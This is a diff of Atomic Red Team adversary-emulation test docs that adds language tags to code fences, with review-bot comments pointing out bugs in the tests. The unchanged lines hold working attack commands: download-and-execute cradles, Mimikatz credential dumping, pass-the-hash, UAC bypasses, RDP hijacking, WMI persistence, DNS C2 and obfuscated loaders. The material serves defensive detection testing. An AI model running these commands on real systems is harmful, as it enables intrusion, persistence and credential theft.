@@ -129,7 +135,9 @@ The intent of this test is to trigger threshold based detection on the number of
#### Attack Commands: Run with `powershell`!
```
```powershell
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
@@ -160,7 +168,9 @@ This behaviour is typical of implants either in an idle state waiting for instru
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -189,7 +199,9 @@ The simulation involves sending DNS queries that gradually increase in length un
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -219,7 +231,9 @@ https://github.com/lukebaggett/dnscat2-powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
```
@@ -246,13 +260,15 @@ Uses cscript //E:jscript to download a file
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```
```cmd
del #{script_file} /F /Q >nul 2>&1
```
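Review bot: the echoed JScript calls `stream.SaveToFile(filename, 1)` but never declares `filename`; the `var` list is `url, fso, request, stream`, so cscript fails with an undefined-variable error after the download completes and nothing is written to disk. Add the output path to the var list (for example as a second input argument next to `#{file_url}`) before the SaveToFile call, and drop the unused `fso`.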
+4 -2
@@ -24,12 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
#### Attack Commands: Run with `command_prompt`!
```
```cmd
$PathToAtomicsFolder\T1073\bin\GUP.exe
```
#### Cleanup Commands:
```
```cmd
taskkill /F /IM #{process_name}
```
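Review bot: the `cmd` tag is the right output for the `command_prompt` executor, but the command `$PathToAtomicsFolder\T1073\bin\GUP.exe` uses the PowerShell variable `$PathToAtomicsFolder`, which cmd.exe treats as a literal string, so the binary is never found. Either change the executor to `powershell` in the YAML or express the path with a cmd-style variable.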
+10 -4
@@ -23,7 +23,9 @@ Utilize powershell to download discovery.bat and save to a local file
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
```
@@ -43,7 +45,9 @@ Utilize curl to download discovery.sh and execute a basic information gathering
#### Attack Commands: Run with `bash`!
```
```bash
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log
```
@@ -63,12 +67,14 @@ Use living off the land tools to zip a file and stage it in the Windows temporar
#### Attack Commands: Run with `powershell`!
```
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
```
#### Cleanup Commands:
```
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
```
+9 -4
@@ -29,7 +29,9 @@ Note: must dump hashes first
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
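Review bot: `mimikatz # sekurlsa::pth ...` is a line from an interactive mimikatz session (the `mimikatz #` prefix is its prompt), not a command that cmd.exe can execute, so the new `cmd` tag misdescribes the block. Passing the module command as an argument to the executable, the way the other tests pass arguments, would make the block match its executor and let the runner actually invoke it.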
@@ -58,20 +60,23 @@ command execute with crackmapexec
#### Attack Commands: Run with `command_prompt`!
```
```cmd
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
```
#### Dependencies: Run with `powershell`!
##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
##### Check Prereq Commands:
```
```powershell
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```
##### Get Prereq Commands:
```
```powershell
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
```
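Review bot: the prereq check `if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }` writes 0 or -1 to the pipeline instead of setting an exit code, so an executor that keys off `$LASTEXITCODE` sees success either way; every other test in this commit uses `{exit 0} else {exit 1}`, so align it. The attack command also invokes a bare `crackmapexec` while the dependency checks `#{crackmapexec_exe}`; reference the same path in both so the check actually guards the command.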
+10 -5
@@ -23,14 +23,16 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
```
#### Cleanup Commands:
```
```cmd
sc.exe delete sesshijack
```
@@ -55,20 +57,23 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser
#### Attack Commands: Run with `powershell`!
```
```powershell
Connect-RDP -ComputerName #{logonserver} -User #{username}
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
+12 -4
@@ -35,7 +35,9 @@ Connecting To Remote Shares
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
@@ -62,7 +64,9 @@ Map Admin share utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
@@ -88,7 +92,9 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
psexec.exe #{remote_host} -c #{command_path}
```
@@ -115,7 +121,9 @@ This technique is used by post-exploitation frameworks.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
+12 -4
@@ -29,7 +29,9 @@ In cloud environments, authenticated user credentials are often stored in local
#### Attack Commands: Run with `sh`!
```
```sh
python2 laZagne.py all
```
@@ -54,7 +56,9 @@ Extracting credentials from files
#### Attack Commands: Run with `sh`!
```
```sh
grep -ri password #{file_path}
```
@@ -74,7 +78,9 @@ Extracting Credentials from Files
#### Attack Commands: Run with `powershell`!
```
```powershell
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
```
@@ -95,7 +101,9 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
+24 -8
@@ -51,7 +51,9 @@ Identify System Info
#### Attack Commands: Run with `command_prompt`!
```
```cmd
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
@@ -72,7 +74,9 @@ Identify System Info
#### Attack Commands: Run with `sh`!
```
```sh
systemsetup
system_profiler
ls -al /Applications
@@ -94,7 +98,9 @@ Identify System Info
#### Attack Commands: Run with `sh`!
```
```sh
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
@@ -118,7 +124,9 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
#### Attack Commands: Run with `bash`!
```
```bash
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -145,7 +153,9 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
#### Attack Commands: Run with `bash`!
```
```bash
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
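Review bot: `sudo lsmod | grep -i "vmw_baloon\|vmxnet"` misspells the VMware balloon driver; the module is `vmw_balloon`, so that half of the pattern never matches on a VMware guest and the test underreports the very thing it is meant to detect. Fix the spelling in the YAML and regenerate.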
@@ -169,7 +179,9 @@ Identify system hostname for Windows.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
hostname
```
@@ -189,7 +201,9 @@ Identify system hostname for Linux and macOS systems.
#### Attack Commands: Run with `bash`!
```
```bash
hostname
```
@@ -209,7 +223,9 @@ Identify the Windows MachineGUID value for a system.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```
+12 -4
@@ -31,7 +31,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
@@ -58,7 +60,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `powershell`!
```
```powershell
ls -recurse
get-childitem -recurse
gci -recurse
@@ -86,7 +90,9 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
#### Attack Commands: Run with `sh`!
```
```sh
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
file */* *>> ../files.txt
@@ -112,7 +118,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `sh`!
```
```sh
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
find . -type f -iname *.pdf > /tmp/loot.txt
+4 -2
@@ -25,7 +25,9 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
@@ -44,7 +46,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
```
#### Cleanup Commands:
```
```powershell
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+30 -14
@@ -36,7 +36,9 @@ Test execution of a remote script using rundll32.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
@@ -63,7 +65,9 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
```
@@ -90,20 +94,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
```
@@ -129,20 +136,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
```
@@ -168,20 +178,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
```
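Review bot: the attack command in this hunk, `rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}`, prefixes the input with `.\`, while the prereq in the same hunk writes and checks the same input without it (`Invoke-WebRequest ... -OutFile "#{inf_to_execute}"`, `Test-Path #{inf_to_execute}`). If `inf_to_execute` is an absolute path, `.\C:\...` is not a valid path and rundll32 will not find the INF that the prereq just downloaded. Either drop the `.\` or state in the input description that a relative path is required. The setupapi.dll variant in the next hunk has the same `.\#{inf_to_execute}` mismatch.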
@@ -207,20 +220,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
```
+47 -19
@@ -56,7 +56,9 @@ Download Mimikatz and dump credentials
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
@@ -81,7 +83,9 @@ Download Bloodhound and run it
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
@@ -102,7 +106,9 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
#### Attack Commands: Run with `powershell`!
```
```powershell
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -124,7 +130,9 @@ Run mimikatz via PsSendKeys
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
@@ -145,7 +153,9 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
#### Attack Commands: Run with `command_prompt`!
```
```cmd
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
@@ -173,7 +183,9 @@ Using PS 5.1, add a user via CLI
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
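Review bot: `New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'` passes the password as a bare string, but `-Password` is typed as SecureString, so PowerShell rejects the argument and the user is never created. Wrap it: `-Password (ConvertTo-SecureString '#{password}' -AsPlainText -Force)`. The fix belongs in the source yaml since this markdown is generated.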
@@ -200,7 +212,9 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -227,7 +241,9 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -253,7 +269,9 @@ Powershell xml download request
#### Attack Commands: Run with `command_prompt`!
```
```cmd
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -279,7 +297,9 @@ Powershell invoke mshta to download payload
#### Attack Commands: Run with `powershell`!
```
```powershell
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@@ -319,14 +339,16 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
#### Attack Commands: Run with `powershell`!
```
```powershell
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
#### Cleanup Commands:
```
```powershell
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
```
@@ -346,20 +368,23 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
#### Attack Commands: Run with `powershell`!
```
```powershell
powershell.exe -version 2 -Command Write-Host $PSVersion
```
#### Dependencies: Run with `powershell`!
##### Description: PowerShell version 2 must be installed
##### Check Prereq Commands:
```
```powershell
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
```
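Review bot: the attack command `powershell.exe -version 2 -Command Write-Host $PSVersion` references `$PSVersion`, which is not an automatic variable, and because it is unquoted the calling PowerShell host expands it (to nothing) before `powershell.exe` is even launched, so the test prints an empty line regardless of whether the v2 engine started. Use `powershell.exe -version 2 -Command '$PSVersionTable.PSVersion'` so the expression reaches the child process intact and shows the engine version that actually ran.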
@@ -382,26 +407,29 @@ Creates a file with an alternate data stream and simulates executing that hidden
#### Attack Commands: Run with `powershell`!
```
```powershell
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{ads_file} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Homedrive must be an NTFS drive
##### Check Prereq Commands:
```
```powershell
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Prereq's for this test cannot be met automatically
```
+33 -11
@@ -64,7 +64,9 @@ Enumerate all accounts by copying /etc/passwd to another file
#### Attack Commands: Run with `sh`!
```
```sh
cat /etc/passwd > #{output_file}
```
@@ -89,7 +91,9 @@ cat /etc/passwd > #{output_file}
#### Attack Commands: Run with `sh`!
```
```sh
cat /etc/sudoers > #{output_file}
```
@@ -114,7 +118,9 @@ View accounts wtih UID 0
#### Attack Commands: Run with `sh`!
```
```sh
grep 'x:0:' /etc/passwd > #{output_file}
```
@@ -134,7 +140,9 @@ List opened files by user
#### Attack Commands: Run with `sh`!
```
```sh
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
@@ -159,7 +167,9 @@ Show if a user account has ever logged in remotely
#### Attack Commands: Run with `sh`!
```
```sh
lastlog > #{output_file}
```
@@ -179,7 +189,9 @@ Utilize groups and id to enumerate users and groups
#### Attack Commands: Run with `sh`!
```
```sh
groups
id
```
@@ -200,7 +212,9 @@ Utilize local utilities to enumerate users and groups
#### Attack Commands: Run with `sh`!
```
```sh
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -224,7 +238,9 @@ Enumerate all accounts
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net user
net user /domain
dir c:\Users\
@@ -249,7 +265,9 @@ Enumerate all accounts via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
net user
net user /domain
get-localuser
@@ -279,7 +297,9 @@ Enumerate logged on users
#### Attack Commands: Run with `command_prompt`!
```
```cmd
query user
```
@@ -299,7 +319,9 @@ Enumerate logged on users via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
query user
```
+24 -12
@@ -40,13 +40,15 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
#### Attack Commands: Run with `command_prompt`!
```
```cmd
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
#### Cleanup Commands:
```
```cmd
reg.exe delete hkcu\software\classes\mscfile /f
```
@@ -70,14 +72,16 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
```
@@ -101,14 +105,16 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
#### Attack Commands: Run with `command_prompt`!
```
```cmd
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
#### Cleanup Commands:
```
```cmd
reg.exe delete hkcu\software\classes\ms-settings /f
```
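Review bot: the second attack line, `reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"`, has no `/f`, so on a re-run (value already present from a previous execution) reg.exe prompts "overwrite (Yes/No)?" and the non-interactive test hangs. The first line already uses `/f`, and the PowerShell variant below uses `-Force`; make this one consistent: `reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f`.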
@@ -132,7 +138,9 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
@@ -140,7 +148,7 @@ Start-Process "C:\Windows\System32\fodhelper.exe"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```
@@ -164,7 +172,9 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
@@ -172,7 +182,7 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```
@@ -196,14 +206,16 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
```
#### Cleanup Commands:
```
```cmd
rd "\\?\C:\Windows \" /S /Q
del "c:\testbypass.exe" >nul 2>nul
```
+79 -37
@@ -55,7 +55,9 @@ Disables the iptables firewall
#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
@@ -84,7 +86,9 @@ Disables syslog collection
